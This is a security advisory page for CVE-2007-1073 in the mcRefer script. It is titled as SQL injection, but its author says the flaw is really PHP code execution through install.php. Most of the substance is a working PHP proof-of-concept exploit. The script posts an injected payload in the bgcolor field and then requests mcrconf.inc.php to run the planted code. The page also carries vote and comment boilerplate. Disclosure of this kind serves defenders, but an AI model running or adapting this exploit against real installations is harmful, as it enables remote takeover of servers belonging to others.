mcRefer SQL injection

2007.02.26

Credit: DarkFig

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-1073

CWE: CWE-89

CVSS Base Score: 10/10

Impact Subscore: 10/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----
#!/usr/bin/php
<?php
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com [email concealed]
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7
D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url
=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

mcRefer SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.